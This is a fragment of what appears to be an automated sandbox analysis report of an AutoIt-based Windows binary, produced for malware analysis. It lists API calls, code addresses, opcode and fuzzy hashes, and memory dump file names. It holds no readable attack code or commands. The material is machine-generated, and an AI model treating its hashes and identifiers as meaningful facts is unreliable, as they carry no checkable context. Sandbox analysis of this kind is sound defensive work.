                                                                  • Instruction ID: ae768e7066d1e04f7855e79809b92d9009dc9707390473df5cf92df91c09aead
                                                                  • Opcode Fuzzy Hash: df4cc759375313698fc185f77ca666dd5dec56042341cc040c61af937e51e6e8
                                                                  • Instruction Fuzzy Hash: B441D365C00214B5DB51FBB8DC8AACFB3AEAF05310F01856AF508E3121FA74E251C3EA
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 006B37B7
                                                                  • GetDC.USER32(00000000), ref: 006B37BF
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B37CA
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 006B37D6
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006B3812
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006B3823
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006B6504,?,?,000000FF,00000000,?,000000FF,?), ref: 006B385E
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006B387D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: eff49a79332bbc2da58889aada07cfdd22480e65498be8c0f3c98e7d72517ff3
                                                                  • Instruction ID: 5f99256c87bf5c88bbd4a72622cd2b904d661b0c1c5351decd2183442129cca9
                                                                  • Opcode Fuzzy Hash: eff49a79332bbc2da58889aada07cfdd22480e65498be8c0f3c98e7d72517ff3
                                                                  • Instruction Fuzzy Hash: 4731A0B2201224BFEB154F54CC89FEB3BAEEF49711F044165FE089E291D6B59C81CBA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 8bc2c661f132333bd519d0c66a23da020637279d3a455e8420eca7df8bb95c61
                                                                  • Instruction ID: 442be8f04d6e6a60058d51af26a38567cdedcd06bf2e44c00d905dce2a7c2e01
                                                                  • Opcode Fuzzy Hash: 8bc2c661f132333bd519d0c66a23da020637279d3a455e8420eca7df8bb95c61
                                                                  • Instruction Fuzzy Hash: 9AD1B171A0060A9FDB10EF68C895AEEB7B6FF49314F148569E906AB381E770DD41CF60
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0066194E
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 006619D1
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00661B7B,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661A64
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661A7B
                                                                    • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00661B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00661AF7
                                                                  • __freea.LIBCMT ref: 00661B22
                                                                  • __freea.LIBCMT ref: 00661B2E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                  • String ID:
                                                                  • API String ID: 2829977744-0
                                                                  • Opcode ID: 40e78d00601b599a0c1f68279253231b6f2a02e584c2c034c37140440530879d
                                                                  • Instruction ID: 79113f456aa2114d1437259fcd129ba7558ec5467ea90194e385a85a24934bc7
                                                                  • Opcode Fuzzy Hash: 40e78d00601b599a0c1f68279253231b6f2a02e584c2c034c37140440530879d
                                                                  • Instruction Fuzzy Hash: 7D91C572E002569BDF248FA4C891AEE7BB79F0A750F1C0669E815EF240E735DD45CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 2610073882-625585964
                                                                  • Opcode ID: 14470536e4bc7d4e96d5a7a5be09efd47f6c77a82a53686415aac53f5b984d20
                                                                  • Instruction ID: 9c3347b8aabf77caf8cee9c75261ff2d518ccdc3c72d14245a00e63a32c5f973
                                                                  • Opcode Fuzzy Hash: 14470536e4bc7d4e96d5a7a5be09efd47f6c77a82a53686415aac53f5b984d20
                                                                  • Instruction Fuzzy Hash: 5A918D71A00615ABDF20DFA5C848FEEBBBAEF46314F108559F506AB280D7709D45CFA0
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00691C1B
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691C43
                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00691C67
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691C97
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691D1E
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691D83
                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00691DEF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                  • String ID:
                                                                  • API String ID: 2550207440-0
                                                                  • Opcode ID: d3aec8b226ad54437df6dbe4870eac84258e595b58d170c10087a5e0ab7dc06c
                                                                  • Instruction ID: 07ba83c13127b3d6ec3b79cac823419fc61dd0a14391f7140e54a3e9ea287a77
                                                                  • Opcode Fuzzy Hash: d3aec8b226ad54437df6dbe4870eac84258e595b58d170c10087a5e0ab7dc06c
                                                                  • Instruction Fuzzy Hash: 4C91E075A0021AEFEF009F94C885BFEB7BAFF06715F204029E940AF691D778A945CB50
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 006A43C8
                                                                  • CharUpperBuffW.USER32(?,?), ref: 006A44D7
                                                                  • _wcslen.LIBCMT ref: 006A44E7
                                                                  • VariantClear.OLEAUT32(?), ref: 006A467C
                                                                    • Part of subcall function 0069169E: VariantInit.OLEAUT32(00000000), ref: 006916DE
                                                                    • Part of subcall function 0069169E: VariantCopy.OLEAUT32(?,?), ref: 006916E7
                                                                    • Part of subcall function 0069169E: VariantClear.OLEAUT32(?), ref: 006916F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4137639002-1221869570
                                                                  • Opcode ID: c2306eba548c1e91b2e4a03f9193d133661eca602b0ed81f92dcdf55cf08e753
                                                                  • Instruction ID: 7a9bacf4c14d4c56299b09fb3b28598bbdd4fab405e0c7faa084e5fac080c610
                                                                  • Opcode Fuzzy Hash: c2306eba548c1e91b2e4a03f9193d133661eca602b0ed81f92dcdf55cf08e753
                                                                  • Instruction Fuzzy Hash: 43911374A087019FC744EF24C88096AB7E6EF8A714F14892DF8899B351DB71ED06CF82
                                                                  APIs
                                                                    • Part of subcall function 006808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?,?,00680C4E), ref: 0068091B
                                                                    • Part of subcall function 006808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680936
                                                                    • Part of subcall function 006808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?,?), ref: 00680944
                                                                    • Part of subcall function 006808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00680831,80070057,?), ref: 00680954
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 006A56AE
                                                                  • _wcslen.LIBCMT ref: 006A57B6
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 006A582C
                                                                  • CoTaskMemFree.OLE32(?), ref: 006A5837
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 614568839-2785691316
                                                                  • Opcode ID: a45febe4a097dbb105e464f0c64f3ed20bc6754cc91f3e1f5e4cc325a76951d3
                                                                  • Instruction ID: bcc967348df76e9ee1cf6a1c37ed2310384c637d84fb7dd0d12dfe5ad622d98c
                                                                  • Opcode Fuzzy Hash: a45febe4a097dbb105e464f0c64f3ed20bc6754cc91f3e1f5e4cc325a76951d3
                                                                  • Instruction Fuzzy Hash: 70911871D00629EFDF10EFA4D890AEDB7BABF08310F104569E516AB251EB749E44CF60
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 006B2C1F
                                                                  • GetMenuItemCount.USER32(00000000), ref: 006B2C51
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006B2C79
                                                                  • _wcslen.LIBCMT ref: 006B2CAF
                                                                  • GetMenuItemID.USER32(?,?), ref: 006B2CE9
                                                                  • GetSubMenu.USER32(?,?), ref: 006B2CF7
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006B2D7F
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                  • String ID:
                                                                  • API String ID: 4196846111-0
                                                                  • Opcode ID: 51ec37af7ed6c5a787a97a0faae5d2186e02328b6c9465d91fe654d5a810badc
                                                                  • Instruction ID: 1d5f15f9670af28d355f1650a8f72a39522b7308c7f8052036f0b91ec4d850fd
                                                                  • Opcode Fuzzy Hash: 51ec37af7ed6c5a787a97a0faae5d2186e02328b6c9465d91fe654d5a810badc
                                                                  • Instruction Fuzzy Hash: 5D7182B5A00216AFCB50DF64C855AEEBBF2EF48310F148469E816EB351DB34AD81CF90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0068B8C0
                                                                  • GetKeyboardState.USER32(?), ref: 0068B8D5
                                                                  • SetKeyboardState.USER32(?), ref: 0068B936
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0068B964
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0068B983
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 0068B9C4
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0068B9E7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: fb296740cb8099cd9f2fa8f66e512969a64bbfdb17bd5aa2af16d79440a56d28
                                                                  • Instruction ID: 0894a149e6c4eeb8d461c9941b532333d18ba404d84b3eff952562c1b05c3ec1
                                                                  • Opcode Fuzzy Hash: fb296740cb8099cd9f2fa8f66e512969a64bbfdb17bd5aa2af16d79440a56d28
                                                                  • Instruction Fuzzy Hash: 375123A05087D53EFB3662388C55BFA7EAB9F06304F08A689E2D5459D2D3D8ECC4D750
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 0068B6E0
                                                                  • GetKeyboardState.USER32(?), ref: 0068B6F5
                                                                  • SetKeyboardState.USER32(?), ref: 0068B756
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0068B782
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0068B79F
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0068B7DE
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0068B7FF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 7bdb386d70ebac718491ccaeee7e35558fcc73827cc9e2262e0d7e30aefa5280
                                                                  • Instruction ID: a0a7f4735f6d4921a7be994eee5ae8fa76ff1c3f9ffcd2b3235ab7f2dee4c370
                                                                  • Opcode Fuzzy Hash: 7bdb386d70ebac718491ccaeee7e35558fcc73827cc9e2262e0d7e30aefa5280
                                                                  • Instruction Fuzzy Hash: 615135A09487D53EFB32A334CC11BBABEAA5B06304F0C968DE0D54A9C2D394ECC4D754
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00655F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 006557E3
                                                                  • __fassign.LIBCMT ref: 0065585E
                                                                  • __fassign.LIBCMT ref: 00655879
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0065589F
                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,00655F16,00000000,?,?,?,?,?,?,?,?,?,00655F16,?), ref: 006558BE
                                                                  • WriteFile.KERNEL32(?,?,00000001,00655F16,00000000,?,?,?,?,?,?,?,?,?,00655F16,?), ref: 006558F7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: 03c8ad4d04c3024dcd07658331099b89ba576fbee1aa4e656d01a2db26b2fe0d
                                                                  • Instruction ID: 81b0d67795d1c46eed8b9e39a82a37e505cf595650fdccdd712ce4c6efceecb3
                                                                  • Opcode Fuzzy Hash: 03c8ad4d04c3024dcd07658331099b89ba576fbee1aa4e656d01a2db26b2fe0d
                                                                  • Instruction Fuzzy Hash: B651E570A00649DFCB10CFA8D895BEEBBFAFF09311F14415AE956E7291E7309A45CB60
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 006430BB
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 006430C3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00643151
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0064317C
                                                                  • _ValidateLocalCookies.LIBCMT ref: 006431D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: f5041915d76bfffe77240e2d679567a5078c8e96917c79ac75c727ef21dea9f2
                                                                  • Instruction ID: c1d4f2d55b12dd95909f7757a2facd2c6cd9df73139a0d1781890d3f2bbdd8bb
                                                                  • Opcode Fuzzy Hash: f5041915d76bfffe77240e2d679567a5078c8e96917c79ac75c727ef21dea9f2
                                                                  • Instruction Fuzzy Hash: 7441A534E00229ABCF10DF68C885AEEBBB7AF45324F148159E915AB392D731DB05CB91
                                                                  APIs
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0068D7CD,?), ref: 0068E714
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0068D7CD,?), ref: 0068E72D
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0068D7F0
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068D82A
                                                                  • _wcslen.LIBCMT ref: 0068D8B0
                                                                  • _wcslen.LIBCMT ref: 0068D8C6
                                                                  • SHFileOperationW.SHELL32(?), ref: 0068D90C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 3164238972-1173974218
                                                                  • Opcode ID: 9b4cd398ae545e4e4c46cedb5b62315a24afd0d7828b3e702fc88df744e3e5ea
                                                                  • Instruction ID: d3733cfb21c853a4b7bb52121ec10503fa1ef54034e9ae4b77f07a7dd8b0c691
                                                                  • Opcode Fuzzy Hash: 9b4cd398ae545e4e4c46cedb5b62315a24afd0d7828b3e702fc88df744e3e5ea
                                                                  • Instruction Fuzzy Hash: FE4187B1D452189EDF56FFA4D981BDE73BAAF08340F0001EAE505EB181EB35A788CB54
                                                                  APIs
                                                                  • GetInputState.USER32 ref: 00694310
                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00694367
                                                                  • TranslateMessage.USER32(?), ref: 00694390
                                                                  • DispatchMessageW.USER32(?), ref: 0069439A
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006943AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                  • String ID: (o
                                                                  • API String ID: 2256411358-1684096767
                                                                  • Opcode ID: 2f5145a6eb76c2ef6ee26c5b8863250f6d2e7eb6ec14553095a92a733b1a61dc
                                                                  • Instruction ID: 15da857314a68075110a07c3a362788b5af10d2af0edf4032137331261e99c68
                                                                  • Opcode Fuzzy Hash: 2f5145a6eb76c2ef6ee26c5b8863250f6d2e7eb6ec14553095a92a733b1a61dc
                                                                  • Instruction Fuzzy Hash: 3E31A470504346DEEF34CB76D859FF63BAEEB11308F041569D46286AA0EBA49887CF61
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006B38B8
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B38EB
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B3920
                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006B3952
                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006B397C
